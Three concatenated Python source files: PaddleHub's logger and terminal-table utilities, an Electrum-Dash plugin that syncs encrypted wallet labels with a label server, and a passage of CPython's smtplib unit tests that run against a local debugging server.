from paddlehub.env import LOG_HOME
loggers = {}
log_config = {
'DEBUG': {
'level': 10,
'color': 'purple'
},
'INFO': {
'level': 20,
'color': 'green'
},
'TRAIN': {
'level': 21,
'color': 'cyan'
},
'EVAL': {
'level': 22,
'color': 'blue'
},
'WARNING': {
'level': 30,
'color': 'yellow'
},
'ERROR': {
'level': 40,
'color': 'red'
},
'CRITICAL': {
'level': 50,
'color': 'bold_red'
}
}
class Logger(object):
'''
Default logger in PaddleHub
Args:
name(str) : Logger name, default is 'PaddleHub'
'''
def __init__(self, name: str = None):
name = 'PaddleHub' if not name else name
self.logger = logging.getLogger(name)
for key, conf in log_config.items():
logging.addLevelName(conf['level'], key)
self.__dict__[key] = functools.partial(self.__call__, conf['level'])
self.__dict__[key.lower()] = functools.partial(self.__call__, conf['level'])
self.format = colorlog.ColoredFormatter(
'%(log_color)s[%(asctime)-15s] [%(levelname)8s]%(reset)s - %(message)s',
log_colors={key: conf['color']
for key, conf in log_config.items()})
self.handler = logging.StreamHandler()
self.handler.setFormatter(self.format)
self.logger.addHandler(self.handler)
self.logLevel = hubconf.log_level
self.logger.setLevel(logging.DEBUG)
self.logger.propagate = False
self._is_enable = hubconf.log_enable
def disable(self):
self._is_enable = False
def enable(self):
self._is_enable = True
@property
def is_enable(self) -> bool:
return self._is_enable
def __call__(self, log_level: str, msg: str):
if not self.is_enable:
return
self.logger.log(log_level, msg)
@contextlib.contextmanager
def use_terminator(self, terminator: str):
old_terminator = self.handler.terminator
self.handler.terminator = terminator
yield
self.handler.terminator = old_terminator
@contextlib.contextmanager
def processing(self, msg: str, interval: float = 0.1):
'''
Continuously print a rotating progress indicator until the wrapped block finishes.
Args:
msg(str): Message to be printed.
interval(float): Rotation interval in seconds. Defaults to 0.1.
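Examples:
    .. code-block:: python

        # Minimal usage sketch: the spinner keeps redrawing until the block exits.
        logger = Logger()
        with logger.processing('Loading module'):
            time.sleep(3)  # stand-in for any long-running task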
'''
end = False
def _printer():
index = 0
flags = ['\\', '|', '/', '-']
while not end:
flag = flags[index % len(flags)]
with self.use_terminator('\r'):
self.info('{}: {}'.format(msg, flag))
time.sleep(interval)
index += 1
t = threading.Thread(target=_printer)
t.start()
yield
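# Rebinding ``end`` is visible to the _printer closure, which then exits its loop and stops the spinner.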
end = True
class ProgressBar(object):
'''
Progress bar printer
Args:
title(str) : Title text
flush_interval(float): Flush rate of progress bar, default is 0.1.
Examples:
.. code-block:: python
with ProgressBar('Download module') as bar:
for i in range(100):
bar.update(i / 100)
# with continuous bar.update, the progress bar in the terminal
# will continue to update until 100%
#
# Download module
# [##################################################] 100.00%
'''
def __init__(self, title: str, flush_interval: float = 0.1):
self.last_flush_time = time.time()
self.flush_interval = flush_interval
self._end = False
self.title = title
def __enter__(self):
sys.stdout.write('{}\n'.format(self.title))
return self
def __exit__(self, exit_exception, exit_value, exit_traceback):
if not exit_value:
self._end = True
self.update(1)
else:
sys.stdout.write('\n')
def update(self, progress: float):
'''
Update progress bar
Args:
progress: Processing progress, from 0.0 to 1.0
'''
msg = '[{:<50}] {:.2f}%'.format('#' * int(progress * 50), progress * 100)
need_flush = (time.time() - self.last_flush_time) >= self.flush_interval
if need_flush or self._end:
sys.stdout.write('\r{}'.format(msg))
self.last_flush_time = time.time()
sys.stdout.flush()
if self._end:
sys.stdout.write('\n')
class FormattedText(object):
'''
Cross-platform formatted string
Args:
text(str) : Text content
width(int) : Text width; if the text is shorter than this, it is padded with spaces
align(str) : Text alignment, which must be one of:
======== ====================================
Character Meaning
-------- ------------------------------------
'<' The text will remain left aligned
'^' The text will remain middle aligned
'>' The text will remain right aligned
======== ====================================
color(str) : Text color, default is None (depends on the terminal configuration)
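Examples:
    .. code-block:: python

        # Minimal sketch: a green label centered in a 12-character field.
        text = FormattedText('PaddleHub', width=12, align='^', color='green')
        print(text)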
'''
_MAP = {'red': Fore.RED, 'yellow': Fore.YELLOW, 'green': Fore.GREEN, 'blue': Fore.BLUE, 'cyan': Fore.CYAN}
def __init__(self, text: str, width: int = None, align: str = '<', color: str = None):
self.text = text
self.align = align
self.color = FormattedText._MAP[color] if color else color
self.width = width if width else len(self.text)
def __repr__(self) -> str:
form = '{{:{}{}}}'.format(self.align, self.width)
text = form.format(self.text)
if not self.color:
return text
return self.color + text + Fore.RESET
class TableCell(object):
'''The basic components of a table'''
def __init__(self, content: str = '', width: int = 0, align: str = '<', color: str = ''):
self._width = width if width else len(content)
self._width = 1 if self._width < 1 else self._width
self._contents = []
for i in range(0, len(content), self._width):
text = FormattedText(content[i:i + self._width], width, align, color)
self._contents.append(text)
self.align = align
self.color = color
@property
def width(self) -> int:
return self._width
@width.setter
def width(self, value: int):
self._width = value
for content in self._contents:
content.width = value
@property
def height(self) -> int:
return len(self._contents)
@height.setter
def height(self, value: int):
if value < self.height:
raise RuntimeError(self.height, value)
self._contents += [FormattedText('', width=self.width, align=self.align, color=self.color)
] * (value - self.height)
def __len__(self) -> int:
return len(self._contents)
def __getitem__(self, idx: int) -> str:
return self._contents[idx]
def __repr__(self) -> str:
return '\n'.join([str(item) for item in self._contents])
class TableRow(object):
'''Table row composed of TableCell'''
def __init__(self):
self.cells = []
def append(self, cell: TableCell):
self.cells.append(cell)
@property
def width(self) -> int:
_width = 0
for cell in self.cells:
_width += cell.width
return _width
@property
def height(self) -> int:
_height = -1
for cell in self.cells:
_height = max(_height, cell.height)
return _height
def __len__(self) -> int:
return len(self.cells)
def __repr__(self) -> str:
content = ''
for i in range(self.height):
content += '|'
for cell in self.cells:
if i >= cell.height:
content = content + '|'
else:
content = content + str(cell[i]) + '|'
content += '\n'
return content
def __getitem__(self, idx: int) -> TableCell:
return self.cells[idx]
class TableColumn(object):
'''Table column composed of TableCell'''
def __init__(self):
self.cells = []
def append(self, cell: TableCell):
self.cells.append(cell)
@property
def width(self) -> int:
_width = -1
for cell in self.cells:
_width = max(_width, cell.width)
return _width
@property
def height(self) -> int:
_height = 0
for cell in self.cells:
_height += cell.height
return _height
def __len__(self) -> int:
return len(self.cells)
def __getitem__(self, idx: int) -> TableCell:
return self.cells[idx]
class Table(object):
'''
Table with adaptive width and height
Args:
colors(list[str]) : Text colors
aligns(list[str]) : Text alignments
widths(list[int]) : Text widths
Examples:
.. code-block:: python
table = Table(widths=[12, 20])
table.append('name', 'PaddleHub')
table.append('version', '2.0.0')
table.append(
'description',
'PaddleHub is a pretrained model application tool under the PaddlePaddle')
table.append('author')
print(table)
# the result is
# +------------+--------------------+
# |name |PaddleHub |
# +------------+--------------------+
# |version |2.0.0 |
# +------------+--------------------+
# |description |PaddleHub is a pretr|
# | |ained model applicat|
# | |ion tool under the P|
# | |addlePaddle |
# +------------+--------------------+
# |author | |
# +------------+--------------------+
'''
def __init__(self, colors: List[str] = [], aligns: List[str] = [], widths: List[int] = []):
self.rows = []
self.columns = []
self.colors = colors
self.aligns = aligns
self.widths = widths
def append(self, *contents, colors: List[str] = [], aligns: List[str] = [], widths: List[int] = []):
'''
Add a row to the table
Args:
*contents(*list): Contents of the row, each content will be placed in a separate cell
colors(list[str]) : Text colors
aligns(list[str]) : Text alignments
widths(list[int]) : Text widths
'''
newrow = TableRow()
widths = copy.deepcopy(self.widths) if not widths else widths
colors = copy.deepcopy(self.colors) if not colors else colors
aligns = copy.deepcopy(self.aligns) if not aligns else aligns
for idx, content in enumerate(contents):
width = widths[idx] if idx < len(widths) else len(content)
color = colors[idx] if idx < len(colors) else ''
align = aligns[idx] if idx < len(aligns) else ''
newcell = TableCell(content, width=width, color=color, align=align)
newrow.append(newcell)
if idx >= len(self.columns):
newcolumn = TableColumn()
for row in self.rows:
cell = TableCell(width=width, color=color, align=align)
row.append(cell)
newcolumn.append(cell)
newcolumn.append(newcell)
self.columns.append(newcolumn)
else:
self.columns[idx].append(newcell)
for idx in range(len(newrow), len(self.columns)):
width = widths[idx] if idx < len(widths) else self.columns[idx].width
color = colors[idx] if idx < len(colors) else ''
align = aligns[idx] if idx < len(aligns) else ''
cell = TableCell(width=width, color=color, align=align)
newrow.append(cell)
self.rows.append(newrow)
self._adjust()
def _adjust(self):
'''Adjust the width and height of the cells in each row and column.'''
for column in self.columns:
_width = -1
for cell in column:
_width = max(_width, cell.width)
for cell in column:
cell.width = _width
for row in self.rows:
_height = -1
for cell in row:
_height = max(_height, cell.height)
for cell in row:
cell.height = _height
@property
def width(self) -> int:
_width = -1
for row in self.rows:
_width = max(_width, row.width)
return _width
@property
def height(self) -> int:
_height = -1
for column in self.columns:
_height = max(_height, column.height)
return _height
def __repr__(self) -> str:
seprow = '+{}+\n'.format('+'.join(['-' * column.width for column in self.columns]))
content = ''
for row in self.rows:
content = content + str(row)
content += seprow
return seprow + content
def get_file_logger(filename):
'''
Set logger.handler to FileHandler.
Args:
filename(str): filename to logging
Examples:
.. code-block:: python
logger = get_file_logger('test.log')
logger.logger.info('test_1')
'''
log_name = os.path.join(LOG_HOME, filename)
if log_name in loggers:
return loggers[log_name]
logger = Logger()
logger.logger.handlers = []
format = logging.Formatter('[%(asctime)-15s] [%(levelname)8s] - %(message)s')
sh = logging.FileHandler(filename=log_name, mode='a')
sh.setFormatter(format)
logger.logger.addHandler(sh)
logger.logger.setLevel(logging.INFO)
loggers.update({log_name: logger})
return logger
logger = Logger()
|
labels.py
|
import hashlib
import requests
import threading
import json
import sys
import traceback
import base64
from electrum_dash.plugin import BasePlugin, hook
from electrum_dash.crypto import aes_encrypt_with_iv, aes_decrypt_with_iv
from electrum_dash.i18n import _
class LabelsPlugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.target_host = 'labels.electrum.org'
self.wallets = {}
def encode(self, wallet, msg):
password, iv, wallet_id = self.wallets[wallet]
encrypted = aes_encrypt_with_iv(password, iv,
msg.encode('utf8'))
return base64.b64encode(encrypted).decode()
def decode(self, wallet, message):
password, iv, wallet_id = self.wallets[wallet]
decoded = base64.b64decode(message)
decrypted = aes_decrypt_with_iv(password, iv, decoded)
return decrypted.decode('utf8')
def get_nonce(self, wallet):
# nonce is the nonce to be used with the next change
nonce = wallet.storage.get('wallet_nonce')
if nonce is None:
nonce = 1
self.set_nonce(wallet, nonce)
return nonce
def set_nonce(self, wallet, nonce):
self.print_error("set", wallet.basename(), "nonce to", nonce)
wallet.storage.put("wallet_nonce", nonce)
@hook
def set_label(self, wallet, item, label):
if wallet not in self.wallets:
return
if not item:
return
nonce = self.get_nonce(wallet)
wallet_id = self.wallets[wallet][2]
bundle = {"walletId": wallet_id,
"walletNonce": nonce,
"externalId": self.encode(wallet, item),
"encryptedLabel": self.encode(wallet, label)}
t = threading.Thread(target=self.do_request_safe,
args=["POST", "/label", False, bundle])
        t.daemon = True
t.start()
# Caller will write the wallet
self.set_nonce(wallet, nonce + 1)
def do_request(self, method, url = "/labels", is_batch=False, data=None):
url = 'https://' + self.target_host + url
kwargs = {'headers': {}}
if method == 'GET' and data:
kwargs['params'] = data
elif method == 'POST' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['Content-Type'] = 'application/json'
response = requests.request(method, url, **kwargs)
if response.status_code != 200:
raise Exception(response.status_code, response.text)
response = response.json()
if "error" in response:
raise Exception(response["error"])
return response
def do_request_safe(self, *args, **kwargs):
try:
self.do_request(*args, **kwargs)
        except BaseException as e:
            # traceback.print_exc(file=sys.stderr)
            self.print_error('error doing request:', repr(e))
def push_thread(self, wallet):
wallet_data = self.wallets.get(wallet, None)
if not wallet_data:
raise Exception('Wallet {} not loaded'.format(wallet))
wallet_id = wallet_data[2]
bundle = {"labels": [],
"walletId": wallet_id,
"walletNonce": self.get_nonce(wallet)}
for key, value in wallet.labels.items():
try:
encoded_key = self.encode(wallet, key)
encoded_value = self.encode(wallet, value)
except:
self.print_error('cannot encode', repr(key), repr(value))
continue
bundle["labels"].append({'encryptedLabel': encoded_value,
'externalId': encoded_key})
self.do_request("POST", "/labels", True, bundle)
def pull_thread(self, wallet, force):
wallet_data = self.wallets.get(wallet, None)
if not wallet_data:
raise Exception('Wallet {} not loaded'.format(wallet))
wallet_id = wallet_data[2]
nonce = 1 if force else self.get_nonce(wallet) - 1
self.print_error("asking for labels since nonce", nonce)
response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
if response["labels"] is None:
self.print_error('no new labels')
return
result = {}
for label in response["labels"]:
try:
key = self.decode(wallet, label["externalId"])
value = self.decode(wallet, label["encryptedLabel"])
except:
continue
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error('error: no json', key)
continue
result[key] = value
for key, value in result.items():
if force or not wallet.labels.get(key):
wallet.labels[key] = value
self.print_error("received %d labels" % len(response))
# do not write to disk because we're in a daemon thread
wallet.storage.put('labels', wallet.labels)
self.set_nonce(wallet, response["nonce"] + 1)
self.on_pulled(wallet)
def pull_thread_safe(self, wallet, force):
try:
self.pull_thread(wallet, force)
        except BaseException as e:
            # traceback.print_exc(file=sys.stderr)
            self.print_error('could not retrieve labels:', repr(e))
def start_wallet(self, wallet):
nonce = self.get_nonce(wallet)
self.print_error("wallet", wallet.basename(), "nonce is", nonce)
mpk = wallet.get_fingerprint()
if not mpk:
return
mpk = mpk.encode('ascii')
password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
iv = hashlib.sha256(password).digest()[:16]
wallet_id = hashlib.sha256(mpk).hexdigest()
self.wallets[wallet] = (password, iv, wallet_id)
# If there is an auth token we can try to actually start syncing
t = threading.Thread(target=self.pull_thread_safe, args=(wallet, False))
        t.daemon = True
t.start()
def stop_wallet(self, wallet):
self.wallets.pop(wallet, None)
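# NOTE: hypothetical sketch, not part of the plugin. It mirrors how start_wallet()
# derives the (password, iv, wallet_id) triple from the wallet fingerprint and how
# encode()/decode() wrap aes_encrypt_with_iv()/aes_decrypt_with_iv(); the
# 'xpub-demo' fingerprint and 'coffee money' label are made up for illustration.
def _label_crypto_roundtrip_example(fingerprint: str = 'xpub-demo') -> bool:
    mpk = fingerprint.encode('ascii')
    password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
    iv = hashlib.sha256(password).digest()[:16]
    encrypted = aes_encrypt_with_iv(password, iv, 'coffee money'.encode('utf8'))
    transported = base64.b64encode(encrypted).decode()   # what gets POSTed to the label server
    decrypted = aes_decrypt_with_iv(password, iv, base64.b64decode(transported))
    return decrypted.decode('utf8') == 'coffee money'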
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_setup, threading_cleanup, join_thread
from unittest.mock import Mock
HOST = socket_helper.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests:
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port)
client.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
client = self.client(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(client.source_address, ('127.0.0.1', 19876))
client.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
client = self.client("%s:%s" % (HOST, self.port))
client.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
client = self.client(HOST, self.port, local_hostname="testhost")
self.assertEqual(client.local_hostname, "testhost")
client.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
client = self.client(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
client = self.client(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(client.sock.gettimeout())
client.close()
def testTimeoutZero(self):
mock_socket.reply_with(b"220 Hola mundo")
with self.assertRaises(ValueError):
self.client(HOST, self.port, timeout=0)
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
client = self.client(HOST, self.port, timeout=30)
self.assertEqual(client.sock.gettimeout(), 30)
client.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(1)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
client = self.client()
client.set_debuglevel(2)
with support.captured_stderr() as stderr:
client.connect(HOST, self.port)
client.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
class SMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.SMTP
class LMTPGeneralTests(GeneralTests, unittest.TestCase):
client = smtplib.LMTP
def testTimeoutZero(self):
super().testTimeoutZero()
local_host = '/some/local/lmtp/delivery/program'
with self.assertRaises(ValueError):
self.client(local_host, timeout=0)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = socket_helper.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT,
source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
    def testEHLO(self):
        # check the canned EHLO response from DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
